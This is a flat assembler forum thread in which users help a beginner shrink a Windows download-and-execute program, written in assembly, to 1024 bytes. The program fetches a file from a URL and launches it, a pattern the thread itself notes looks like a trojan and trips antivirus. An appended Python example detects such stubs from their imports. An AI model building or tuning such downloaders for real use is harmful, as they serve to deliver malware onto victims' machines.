flat assembler
Message board for the users of flat assembler.

Download & Exec. (1024b)... Help to optimize.

sylwek32 24 Jul 2007, 21:59
Hello,
I'm a beginner in assembler programming and I wanted to use the WinAPI
to make a program which downloads and executes a file.

This is my source:

Code:
format pe
;use32
include 'E:\FASM\fasmw167\INCLUDE\win32ax.inc'

main:

macro loadapi api,lib 
{ 
        invoke LoadLibrary,lib 
        invoke GetProcAddress,eax,`api
        mov [_#api],eax
        jmp @f 
        _#api dd 0
        @@: 
} 

        ; resolve each API the program calls into its _name slot
        loadapi URLDownloadToFileA,'urlmon.dll'
        loadapi ShellExecuteA,'shell32.dll'
        loadapi ExitProcess,'kernel32.dll'

        invoke _URLDownloadToFileA,0,flname ,localf,0,0
        invoke _ShellExecuteA, 0, 'open', localf,0,0,SW_SHOW
        invoke _ExitProcess,0
        ret

        flname db 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe',0
        localf db 'c:\some_file.exe',0

.end main
    


Unfortunately it compiles to 1536 bytes... This is a little big.

Can you help me optimize it, please?

Thanks a lot!


Last edited by sylwek32 on 29 Jul 2007, 20:07; edited 3 times in total
LocoDelAssembly 24 Jul 2007, 22:13
With a simple change I got a 1024-byte executable, but I need permission from a moderator to post it.
sylwek32 24 Jul 2007, 22:16
Why do you need additional permission?
If you have some technical problems, maybe you can send it via PM.
LocoDelAssembly 25 Jul 2007, 00:21
Because the code looks like it is for hackish purposes.

Well, I PMed the minor modification now...
Yardman 25 Jul 2007, 01:41
[ Post removed by author. ]


Last edited by Yardman on 04 Apr 2012, 02:31; edited 1 time in total
LocoDelAssembly 25 Jul 2007, 02:04
I mean the possible use of this tiny program, not the way I stripped those 512 bytes.

I did more or less the same as you, Yardman. The only difference is that in the data import block I just imported GetProcAddressA and LoadLibraryA; the rest of the original code remained intact.
Yardman 25 Jul 2007, 02:29
[ Post removed by author. ]


Last edited by Yardman on 17 Jan 2012, 17:58; edited 1 time in total
kohlrak 25 Jul 2007, 04:21
I wish I knew more about the server on it. It appears that it's not a standard HTTP server, and I have my own purpose for it... My idea could be considered a hack depending on opinion, but I don't want to mention the potential, since this is posted; it would be bad if someone saw it.
sylwek32 25 Jul 2007, 06:38
Thanks.
And yes, my code looked like it was for hacking purposes...
But I planned to use it only at home.

I don't know why, but if I change "format pe" to "format pe gui"
my antivirus software (FreeAV) shows it's a trojan horse.


LocoDelAssembly:

When I start your version, it shows there is no procedure like GetProcessAddressA
in kernel32.dll.
vador 25 Jul 2007, 08:37
GetProcessAddressA ==> GetProcAddressA
sylwek32 25 Jul 2007, 08:48
That's what I meant. Sorry.
It shows there is no procedure in kernel32.dll like GetProcAddressA.
sylwek32 26 Jul 2007, 21:19
I have made some modifications.

It would be great if you would help optimize it.

Code:
;***************************************************
;* 1024-Bytes Download & Execute                   *
;***************************************************



   format pe ; For some reason executable with format pe
             ; gui was identified as a trojan horse by
             ; AntiVir Guard. Format PE seems to fix that.


   include 'E:\FASM\fasmw167\INCLUDE\win32ax.inc'

     main:

        macro loadapi api,lib
        {
         invoke LoadLibrary,lib
         invoke GetProcAddress,eax,`api
         mov [_#api],eax
         jmp @f
         _#api dd 0
         @@:
        }


        ; resolve each API the program calls into its _name slot
        loadapi URLDownloadToFileA,'urlmon.dll'
        loadapi ShellExecuteA,'shell32.dll'
        loadapi ExitProcess,'kernel32.dll'

       ; invoke _URLDownloadToFileA,0,flname ,localf,0,0
        push 0
        push 0
        push strLocalfile
        push strURL
        push 0
        call [_URLDownloadToFileA]

       ; invoke _ShellExecuteA, 0, optrd, localf, 0,0,SW_SHOW
        push SW_SHOW
        push 0
        push 0
        push strLocalfile
        push strFunction
        push 0
        call [_ShellExecuteA]

       ; invoke _ExitProcess,0
       push 0
       call [_ExitProcess]
       ret

       strURL       db 'http://flatassembler.net/fasmw167.zip',0
       strLocalfile db 'c:\fasm.zip',0
       strFunction  db 'open',0

             align 4


        data import
        library kernel,'KERNEL32.DLL'

        import kernel,\
        LoadLibrary,'LoadLibraryA',\
        GetProcAddress,'GetProcAddress'

        end data

    ;eof
    
asmfan 27 Jul 2007, 07:08
Call not through absolute addresses but through a register:

Code:
mov esi,LoadLibrary
call [esi]
call [esi - LoadLibrary + GetProcAddress] ;call GetProcAddress
    

etc.
It would be cheaper to make one import table merged into the code, without searching addresses at all.
Replace ExitProcess with ret.
Replace the absolute paths to the inc files with relative ones (to %fasminc%).
Don't use 'open',0 because ShellExecute run with 0 as that parameter treats it as 'open'.
sylwek32 28 Jul 2007, 17:38
thanks
sylwek32 29 Jul 2007, 10:51
A cleaned-up version:

Code:
;***************************************************
;* 1024-Bytes Download & Execute                   *
;***************************************************



   format pe ; For some reason executable with format pe
             ; gui was identified as a trojan horse by
             ; AntiVir Guard. Format PE seems to fix that.


   include '%fasminc%\win32ax.inc'

     main:

        ;Imports moved

        ; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0
        push 0
        push 0
        push strLocalfile
        push strURL
        push 0
        call [URLDownloadToFileA]

       ; invoke _ShellExecuteA, 0, strFunction, strLocalfile, 0,0,SW_SHOW
        push SW_SHOW
        push 0
        push 0
        push strLocalfile
        push 0 ;0 is open
        push 0
        call [ShellExecuteA]


       ; invoke _ExitProcess,0
       push 0
       call [ExitProcess]
       ret

       strURL       db 'http://flatassembler.net/fasmw167.zip',0
       strLocalfile db 'c:\fasm.zip',0

       align 4


        data import
        library kernel,  'KERNEL32.DLL',\
                shell32, 'SHELL32.DLL',\
                urlmon,  'URLMON.DLL'

        ; import only what the code calls; a library listed without an
        ; import block has no lookup table for the descriptor to point at,
        ; and kernel32 exports GetProcAddress, not GetProcAddressA
        import kernel,\
        ExitProcess,     'ExitProcess'

        import shell32,\
        ShellExecuteA,   'ShellExecuteA'




        import urlmon,\
        URLDownloadToFileA,'URLDownloadToFileA'

        end data

    ;eof
    
sylwek32 31 Jul 2007, 14:54
New version.
Suggestions are welcome!

Thanks for them.

Code:
;***************************************************
;* 1024-Bytes Download & Execute rev. 20           *
;***************************************************



   format pe ; For some reason executable with format pe
             ; gui was identified as a trojan horse by
             ; AntiVir Guard. Format PE seems to fix that.
   entry main ; explicit entry point


   include '%fasminc%\win32ax.inc'

     main:

        ;Imports moved

        ; Download strURL to strLocalfile
        ; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0
        xor eax,eax
        push eax
        push eax
        push strLocalfile
        push strURL
        push eax
        mov esi,LoadLibrary ; IAT base: the other entries are reached as
                            ; [esi+disp8], a 3-byte call instead of 6
        call DWORD [esi - LoadLibrary + URLDownloadToFileA] ;URLDownloadToFileA

        ; eax now holds the HRESULT: 0 (S_OK) only if the download succeeded.
        ; On failure skip the execute step instead of pushing the error code
        ; where ShellExecuteA expects pointers; the HRESULT becomes the exit code.
        test eax,eax
        jnz .exit

        ; Execute Downloaded strLocalfile
        ; invoke _ShellExecuteA, 0, 0, strLocalfile, 0,0,SW_SHOW
        push SW_SHOW
        push eax
        push eax
        push strLocalfile
        push eax ;eax=0 and 0 is open (default verb)
        push eax
        call DWORD [esi - LoadLibrary + ShellExecuteA] ;ShellExecuteA
        xor eax,eax ;ShellExecuteA left an HINSTANCE in eax; exit with code 0

        ; Exit Process
  .exit:
        push eax
        call DWORD [esi - LoadLibrary + ExitProcess] ;ExitProcess
        call DWORD [esi - LoadLibrary + ExitThread]  ;ExitThread (never reached)
        ret

        strURL       db 'http://flatassembler.net/fasmw167.zip',0
        strLocalfile db 'c:\fasmw167.zip',0

        align 4


        data import
        library kernel,  'KERNEL32.DLL',\
                shell32, 'SHELL32.DLL',\
                urlmon,  'URLMON.DLL'

        ; LoadLibraryA is kept only as the base the calls above are
        ; addressed from; kernel32 exports GetProcAddress (no A suffix)
        ; and it is not needed here
        import  kernel,\
                LoadLibrary,       'LoadLibraryA',\
                ExitProcess,       'ExitProcess',\
                ExitThread,        'ExitThread'

        import  shell32,\
                ShellExecuteA,     'ShellExecuteA'

        import  urlmon,\
                URLDownloadToFileA,'URLDownloadToFileA'

        end data

    ;eof
    
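Below is an added example written for this page in Python; it is the editor's own code, not code from the thread or from fasm. It constructs a sample PE32 (labelled as constructed in the code) whose import directory matches the final version's import table, parses that directory back the way an AV engine or an analyst's tooling reads it, and flags the pairing of a URL-fetch API with a file-launch API. The fetch and launch API name lists are the editor's assumption about what such a heuristic keys on; the thread itself only names URLDownloadToFileA and ShellExecuteA.

```python
"""Editor's added example (not from the thread): build a sample PE32 whose import
directory mirrors the final post's, parse it back as an AV engine or analyst's
tooling would, and flag the fetch-API + launch-API pairing of a download and
execute stub.  The API name lists are the editor's assumption of what to key on."""
import struct

FETCH_APIS = {"URLDownloadToFileA", "URLDownloadToFileW",
              "InternetOpenUrlA", "InternetOpenUrlW"}
LAUNCH_APIS = {"ShellExecuteA", "ShellExecuteW", "ShellExecuteExA", "ShellExecuteExW",
               "WinExec", "CreateProcessA", "CreateProcessW"}
SECT_RVA, SECT_OFF, FILE_ALIGN = 0x1000, 0x200, 0x200   # single section, fasm-like layout


def build_sample_pe(imports):
    """Construct a minimal PE32 whose one section holds only an import directory
    for `imports` ({dll: [func, ...]}).  Constructed sample input, not a program."""
    n = len(imports)
    body = bytearray(20 * (n + 1))            # IMAGE_IMPORT_DESCRIPTORs + null terminator
    descs = []
    for dll, funcs in imports.items():
        hint_names = []
        for f in funcs:                        # IMAGE_IMPORT_BY_NAME: WORD hint, name, NUL
            hint_names.append(len(body))
            body += struct.pack("<H", 0) + f.encode() + b"\0"
            body += b"\0" * (len(body) & 1)
        dll_off = len(body)
        body += dll.encode() + b"\0"
        body += b"\0" * (-len(body) & 3)
        ilt = len(body)                        # lookup table: RVAs of the hint/name entries
        body += b"".join(struct.pack("<I", SECT_RVA + o) for o in hint_names) + b"\0" * 4
        iat = len(body)                        # address table: identical on disk
        body += body[ilt:iat]
        descs.append((ilt, dll_off, iat))
    for i, (ilt, dll_off, iat) in enumerate(descs):
        struct.pack_into("<IIIII", body, 20 * i, SECT_RVA + ilt, 0, 0, SECT_RVA + dll_off, SECT_RVA + iat)
    raw = -(-len(body) // FILE_ALIGN) * FILE_ALIGN
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)   # i386, one section
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "IIIIHH" + "IIIIII",
                      0x10B, 0, 0, 0, raw, 0, SECT_RVA, SECT_RVA, SECT_RVA, 0x400000,
                      0x1000, FILE_ALIGN, 4, 0, 0, 0, 4, 0, 0, 0x2000, SECT_OFF, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[1] = (SECT_RVA, 20 * (n + 1))                              # DataDirectory[IMPORT]
    opt += struct.pack("<" + "II" * 16, *[v for d in dirs for v in d])
    sect = struct.pack("<8sIIIIIIHHI", b".flat", len(body), SECT_RVA, raw, SECT_OFF,
                       0, 0, 0, 0, 0xE0000060)
    headers = dos + b"PE\0\0" + coff + opt + sect
    return headers.ljust(SECT_OFF, b"\0") + bytes(body).ljust(raw, b"\0")


def parse_imports(data):
    """Walk a PE32 import directory; return {dll: [name or 'ordinal#N', ...]}."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    opt = pe + 24
    if data[pe:pe + 4] != b"PE\0\0" or struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 (32-bit) image")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    imp_rva = struct.unpack_from("<I", data, opt + 96 + 8)[0]    # DataDirectory[1].VirtualAddress
    sections = []
    for i in range(nsec):        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        vsize, va, rsize, roff = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, max(vsize, rsize), roff))

    def off(rva):                # RVA -> file offset through the section table
        for va, size, roff in sections:
            if va <= rva < va + size:
                return roff + rva - va
        raise ValueError("RVA %#x lies outside every section" % rva)

    def cstr(o):
        return data[o:data.index(b"\0", o)].decode("latin-1")

    result, d = {}, (off(imp_rva) if imp_rva else None)
    while d is not None:
        ilt, _, _, name_rva, iat = struct.unpack_from("<IIIII", data, d)
        if name_rva == 0:        # all-zero descriptor terminates the directory
            break
        names, t = [], off(ilt or iat)   # bound images may zero the ILT: fall back to the IAT
        while True:
            e = struct.unpack_from("<I", data, t)[0]
            if e == 0:
                break
            names.append("ordinal#%d" % (e & 0xFFFF) if e & 0x80000000 else cstr(off(e) + 2))
            t += 4
        result[cstr(off(name_rva))] = names
        d += 20
    return result


def downloader_indicators(imports):
    """Return (fetch APIs, launch APIs) found among the imported names."""
    names = {f for funcs in imports.values() for f in funcs}
    return sorted(names & FETCH_APIS), sorted(names & LAUNCH_APIS)


def looks_like_downloader(imports):
    """True when an image both fetches a URL to disk and launches a file."""
    fetch, launch = downloader_indicators(imports)
    return bool(fetch) and bool(launch)


# Constructed sample mirroring the import table of the thread's final version.
SAMPLE_PE = build_sample_pe({"KERNEL32.DLL": ["LoadLibraryA", "ExitProcess", "ExitThread"],
                             "SHELL32.DLL": ["ShellExecuteA"],
                             "URLMON.DLL": ["URLDownloadToFileA"]})

if __name__ == "__main__":
    found = parse_imports(SAMPLE_PE)
    print(len(SAMPLE_PE), "bytes", found, downloader_indicators(found), looks_like_downloader(found))
```

Run it as a script to print the recovered imports and the verdict, or pass the bytes of a real 32-bit executable to parse_imports. Two things it makes concrete for the thread: the import names are what a pairing rule like this sees, whereas `format pe` versus `format pe gui` only changes the Subsystem word in the optional header; and with fasm's default FileAlignment of 512 bytes a file is its headers plus a 512-byte multiple per section, so keeping the import directory inside the single code section (the `data import` block of the later versions) rather than in a separate import section accounts for the 512 bytes between 1536 and 1024.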
Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.
